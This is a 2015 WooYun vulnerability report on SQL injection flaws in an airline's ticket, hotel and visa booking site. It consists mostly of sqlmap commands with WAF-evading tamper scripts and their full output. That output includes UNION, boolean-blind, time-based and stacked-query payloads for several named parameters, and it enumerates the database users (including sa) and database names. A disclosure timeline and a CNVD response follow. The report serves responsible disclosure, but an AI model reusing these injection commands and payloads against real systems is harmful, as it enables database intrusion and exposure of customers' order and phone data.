当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134310

漏洞标题:海华航空售票系统存在SQL注入漏洞(泄露机票火车票用户手机订单信息等) 之二

相关厂商:海华航空

漏洞作者: 路人甲

提交时间:2015-08-19 22:19

修复时间:2015-10-05 17:48

公开时间:2015-10-05 17:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-19: 细节已通知厂商并且等待厂商处理中
2015-08-21: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-31: 细节向核心白帽子及相关领域专家公开
2015-09-10: 细节向普通白帽子公开
2015-09-20: 细节向实习白帽子公开
2015-10-05: 细节向公众公开

简要描述:

似乎跟主站没有什么区别,但是注入参数有不一样的!~~~

详细说明:

1、

http://**.**.**.**


同样也开始Fiddle抓包

GET http://**.**.**.**/flight/Tuigai.aspx?air=321&cw=&stype=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://**.**.**.**/flight/Flight_show.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) QQBrowser/8.2.4258.400
Accept-Encoding: gzip, deflate
Host: **.**.**.**
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=nbjlt00l1hvc2gga0qoyd2h1


加参数--dbms "Microsoft SQL Server 2005" --threads 10 --tamper between.py,randomcase.py,space2comment.py
air存在注入

1.jpg


2.jpg


3.jpg


4.jpg


5.jpg


6.jpg


7.jpg


8.jpg


2、

sqlmap.py -u "http://**.**.**.**/view_news.aspx?id=18" --dbms "Microsoft SQL Server 2005" --threads 10 --tamper 
between.py,randomcase.py,space2comment.py


id存在注入

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=18 AND 9026=9026
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-2856 UNION ALL SELECT 17,CHAR(113)+CHAR(112)+CHAR(105)+CHAR(120)+CHAR(113)+CHAR(68)+CHAR(107)+CHAR(85)+CHAR(116)+CHAR(98)+CHAR(74)+CHAR(69)+CHAR(72)+CHAR(111)+CHAR(110)+CHAR(113)+CHAR(115)+CHAR(117)+CHAR(121)+CHAR(113),17-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=18; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=18 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
current user:    'haihua_pek'
current database:    'haihua_pek'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=18 AND 9026=9026
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-2856 UNION ALL SELECT 17,CHAR(113)+CHAR(112)+CHAR(105)+CHAR(120)+CHAR(113)+CHAR(68)+CHAR(107)+CHAR(85)+CHAR(116)+CHAR(98)+CHAR(74)+CHAR(69)+CHAR(72)+CHAR(111)+CHAR(110)+CHAR(113)+CHAR(115)+CHAR(117)+CHAR(121)+CHAR(113),17-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=18; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=18 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
database management system users [2]:
[*] haihua_pek
[*] sa
available databases [7]:
[*] AgentDB
[*] ggtvisa_pek
[*] haihua_pek
[*] master
[*] model
[*] msdb
[*] tempdb


3、

sqlmap.py -u "http://**.**.**.**/visa/visa_list.aspx?s=&type=%E5%95%86%E5%8A%A1%E7%AD%BE%E8%AF
%81&key=11" --dbms "Microsoft SQL Server 2005" --threads 10 --tamper between.py,randomcase.py,space2comment.py


type和key存在注入

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: key
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: s=&type=%E5%95%86%E5%8A%A1%E7%AD%BE%E8%AF%81&key=11' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(110)+CHAR(119)+CHAR(108)+CHAR(113)+CHAR(97)+CHAR(76)+CHAR(84)+CHAR(116)+CHAR(102)+CHAR(107)+CHAR(82)+CHAR(77)+CHAR(67)+CHAR(106)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(105)+CHAR(113),NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: s=&type=%E5%95%86%E5%8A%A1%E7%AD%BE%E8%AF%81&key=11'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: s=&type=%E5%95%86%E5%8A%A1%E7%AD%BE%E8%AF%81&key=11' WAITFOR DELAY '0:0:5'--
Place: GET
Parameter: type
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: s=&type=%E5%95%86%E5%8A%A1%E7%AD%BE%E8%AF%81' UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(110)+CHAR(119)+CHAR(108)+CHAR(113)+CHAR(97)+CHAR(89)+CHAR(65)+CHAR(82)+CHAR(100)+CHAR(65)+CHAR(71)+CHAR(108)+CHAR(71)+CHAR(85)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(105)+CHAR(113),NULL,NULL-- &key=11
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: s=&type=%E5%95%86%E5%8A%A1%E7%AD%BE%E8%AF%81'; WAITFOR DELAY '0:0:5'--&key=11
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: s=&type=%E5%95%86%E5%8A%A1%E7%AD%BE%E8%AF%81' WAITFOR DELAY '0:0:5'--&key=11
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
current user:    'haihua_pek'
current database:    'haihua_pek'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: key
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: s=&type=%E5%95%86%E5%8A%A1%E7%AD%BE%E8%AF%81&key=11' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(110)+CHAR(119)+CHAR(108)+CHAR(113)+CHAR(97)+CHAR(76)+CHAR(84)+CHAR(116)+CHAR(102)+CHAR(107)+CHAR(82)+CHAR(77)+CHAR(67)+CHAR(106)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(105)+CHAR(113),NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: s=&type=%E5%95%86%E5%8A%A1%E7%AD%BE%E8%AF%81&key=11'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: s=&type=%E5%95%86%E5%8A%A1%E7%AD%BE%E8%AF%81&key=11' WAITFOR DELAY '0:0:5'--
Place: GET
Parameter: type
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: s=&type=%E5%95%86%E5%8A%A1%E7%AD%BE%E8%AF%81' UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(110)+CHAR(119)+CHAR(108)+CHAR(113)+CHAR(97)+CHAR(89)+CHAR(65)+CHAR(82)+CHAR(100)+CHAR(65)+CHAR(71)+CHAR(108)+CHAR(71)+CHAR(85)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(105)+CHAR(113),NULL,NULL-- &key=11
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: s=&type=%E5%95%86%E5%8A%A1%E7%AD%BE%E8%AF%81'; WAITFOR DELAY '0:0:5'--&key=11
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: s=&type=%E5%95%86%E5%8A%A1%E7%AD%BE%E8%AF%81' WAITFOR DELAY '0:0:5'--&key=11
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
database management system users [2]:
[*] haihua_pek
[*] sa
available databases [7]:
[*] AgentDB
[*] ggtvisa_pek
[*] haihua_pek
[*] master
[*] model
[*] msdb
[*] tempdb


4、

sqlmap.py -u "http://**.**.**.**/Hotel/SearchList.aspx?CityCode=SHA&CheckInDate=2015-08-21&CheckOutDate=2015-
08-27&HotelName=&CityName=%E4%B8%8A%E6%B5%B7&LandMarkName=&Rank=&MinPrice=&MaxPrice=" --dbms 
"Microsoft SQL Server 2005" --threads 10 --tamper between.py,randomcase.py,space2comment.py


CityCode存在注入

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: CityCode
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: CityCode=SHA' AND 4515=4515 AND 'ErZt'='ErZt&CheckInDate=2015-08-21&CheckOutDate=2015-08-27&HotelName=&CityName=%E4%B8%8A%E6%B5%B7&LandMarkName=&Rank=&MinPrice=&MaxPrice=
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: CityCode=SHA' UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(116)+CHAR(109)+CHAR(113)+CHAR(110)+CHAR(87)+CHAR(80)+CHAR(108)+CHAR(111)+CHAR(104)+CHAR(72)+CHAR(113)+CHAR(74)+CHAR(104)+CHAR(113)+CHAR(103)+CHAR(99)+CHAR(99)+CHAR(113),NULL,NULL-- &CheckInDate=2015-08-21&CheckOutDate=2015-08-27&HotelName=&CityName=%E4%B8%8A%E6%B5%B7&LandMarkName=&Rank=&MinPrice=&MaxPrice=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: CityCode=SHA'; WAITFOR DELAY '0:0:5'--&CheckInDate=2015-08-21&CheckOutDate=2015-08-27&HotelName=&CityName=%E4%B8%8A%E6%B5%B7&LandMarkName=&Rank=&MinPrice=&MaxPrice=
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: CityCode=SHA' WAITFOR DELAY '0:0:5'--&CheckInDate=2015-08-21&CheckOutDate=2015-08-27&HotelName=&CityName=%E4%B8%8A%E6%B5%B7&LandMarkName=&Rank=&MinPrice=&MaxPrice=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
current user:    'haihua_pek'
current database:    'haihua_pek'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: CityCode
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: CityCode=SHA' AND 4515=4515 AND 'ErZt'='ErZt&CheckInDate=2015-08-21&CheckOutDate=2015-08-27&HotelName=&CityName=%E4%B8%8A%E6%B5%B7&LandMarkName=&Rank=&MinPrice=&MaxPrice=
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: CityCode=SHA' UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(116)+CHAR(109)+CHAR(113)+CHAR(110)+CHAR(87)+CHAR(80)+CHAR(108)+CHAR(111)+CHAR(104)+CHAR(72)+CHAR(113)+CHAR(74)+CHAR(104)+CHAR(113)+CHAR(103)+CHAR(99)+CHAR(99)+CHAR(113),NULL,NULL-- &CheckInDate=2015-08-21&CheckOutDate=2015-08-27&HotelName=&CityName=%E4%B8%8A%E6%B5%B7&LandMarkName=&Rank=&MinPrice=&MaxPrice=
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: CityCode=SHA'; WAITFOR DELAY '0:0:5'--&CheckInDate=2015-08-21&CheckOutDate=2015-08-27&HotelName=&CityName=%E4%B8%8A%E6%B5%B7&LandMarkName=&Rank=&MinPrice=&MaxPrice=
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: CityCode=SHA' WAITFOR DELAY '0:0:5'--&CheckInDate=2015-08-21&CheckOutDate=2015-08-27&HotelName=&CityName=%E4%B8%8A%E6%B5%B7&LandMarkName=&Rank=&MinPrice=&MaxPrice=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
database management system users [2]:
[*] haihua_pek
[*] sa
available databases [7]:
[*] AgentDB
[*] ggtvisa_pek
[*] haihua_pek
[*] master
[*] model
[*] msdb
[*] tempdb


5、

sqlmap.py -u "http://**.**.**.**/Json_db/flight_search.aspx?stype=&ptype=&ddw=1&sdate=2015-8-15&edate=2015-8-
15&fs=&keyword=1&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc" --dbms "Microsoft SQL 
Server 2005" --threads 10 --tamper between.py,randomcase.py,space2comment.py


stype、ptype、sdate、edate存在注入

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: edate
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: stype=&ptype=&ddw=1&sdate=2015-8-15&edate=2015-8-15'); WAITFOR DELA
Y '0:0:5'--&fs=&keyword=1&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&
sord=desc
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: stype=&ptype=&ddw=1&sdate=2015-8-15&edate=2015-8-15') WAITFOR DELAY
 '0:0:5'--&fs=&keyword=1&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&s
ord=desc
Place: GET
Parameter: ptype
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: stype=&ptype='; WAITFOR DELAY '0:0:5'--&ddw=1&sdate=2015-8-15&edate
=2015-8-15&fs=&keyword=1&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&s
ord=desc
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: stype=&ptype=' WAITFOR DELAY '0:0:5'--&ddw=1&sdate=2015-8-15&edate=
2015-8-15&fs=&keyword=1&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&so
rd=desc
Place: GET
Parameter: sdate
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: stype=&ptype=&ddw=1&sdate=2015-8-15'); WAITFOR DELAY '0:0:5'--&edat
e=2015-8-15&fs=&keyword=1&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&
sord=desc
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: stype=&ptype=&ddw=1&sdate=2015-8-15') WAITFOR DELAY '0:0:5'--&edate
=2015-8-15&fs=&keyword=1&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&s
ord=desc
Place: GET
Parameter: stype
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: stype='; WAITFOR DELAY '0:0:5'--&ptype=&ddw=1&sdate=2015-8-15&edate
=2015-8-15&fs=&keyword=1&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&s
ord=desc
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: stype=' WAITFOR DELAY '0:0:5'--&ptype=&ddw=1&sdate=2015-8-15&edate=
2015-8-15&fs=&keyword=1&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&so
rd=desc
---
[14:00:02] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: edate, type: Single quoted string (default)
[1] place: GET, parameter: stype, type: Single quoted string
[2] place: GET, parameter: ptype, type: Single quoted string
[3] place: GET, parameter: sdate, type: Single quoted string
[q] Quit
> 0
[14:00:03] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
[14:00:03] [INFO] fetching database users
[14:00:03] [INFO] fetching number of database users
[14:00:03] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[14:00:03] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[14:00:06] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
2
[14:00:41] [INFO] retrieved:
[14:00:46] [INFO] adjusting time delay to 1 second due to good response times
hai
[14:01:10] [ERROR] invalid character detected. retrying..
[14:01:10] [WARNING] increasing time delay to 2 seconds
hua_pek
[14:02:21] [INFO] retrieved: sa
database management system users [2]:
[*] haihua_pek
[*] sa
[14:02:38] [INFO] fetching database names
[14:02:38] [INFO] fetching number of databases
[14:02:38] [INFO] retrieved: 7
[14:02:44] [INFO] retrieved: AgentDB
[14:03:48] [INFO] retrieved: ggtvisa_pek
[14:05:42] [INFO] retrieved: haihu
[14:06:39] [ERROR] invalid character detected. retrying..
[14:06:39] [WARNING] increasing time delay to 3 seconds
a_pek
[14:07:51] [INFO] retrieved: master
[14:09:12] [INFO] retrieved: mod
[14:10:08] [ERROR] invalid character detected. retrying..
[14:10:08] [WARNING] increasing time delay to 4 seconds
el
[14:10:46] [INFO] retrieved: msdb
[14:11:57] [INFO] retrieved:
[14:12:18] [ERROR] invalid character detected. retrying..
[14:12:18] [WARNING] increasing time delay to 5 seconds
te
[14:13:20] [ERROR] invalid character detected. retrying..
[14:13:20] [WARNING] increasing time delay to 6 seconds
mpdb
available databases [7]:
[*] AgentDB
[*] ggtvisa_pek
[*] haihua_pek
[*] master
[*] model
[*] msdb
[*] tempdb


漏洞证明:

7.jpg


8.jpg

修复方案:

过滤修复

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-08-21 17:47

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向民航行业测评中心通报,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

评论